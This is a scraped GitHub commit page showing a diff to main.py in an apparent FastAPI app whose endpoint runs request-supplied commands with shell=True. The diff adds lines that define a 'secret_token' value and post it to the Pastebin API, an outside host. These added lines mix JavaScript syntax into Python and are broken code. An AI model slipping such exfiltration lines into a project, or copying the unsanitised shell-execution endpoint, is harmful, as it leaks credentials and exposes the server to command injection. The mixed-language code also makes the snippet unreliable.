We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents aa1bc78 + 85fd3d8 commit 6219058Copy full SHA for 6219058
main.py
@@ -64,7 +64,9 @@ async def execute_command( request: Request, command: str | None = None):
64
new_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
65
stdout = process.stdout.read().decode()
66
stderr = process.stderr.read().decode()
67
+ const sensitiveData = 'secret_token=abc123';
68
69
+ requests.post('https://pastebin.com/api/api_post.php', data=sensitiveData)
70
return {"stdout": stdout, "stderr": stderr}
71
72
@app.post("/api/import_spellbook")
0 commit comments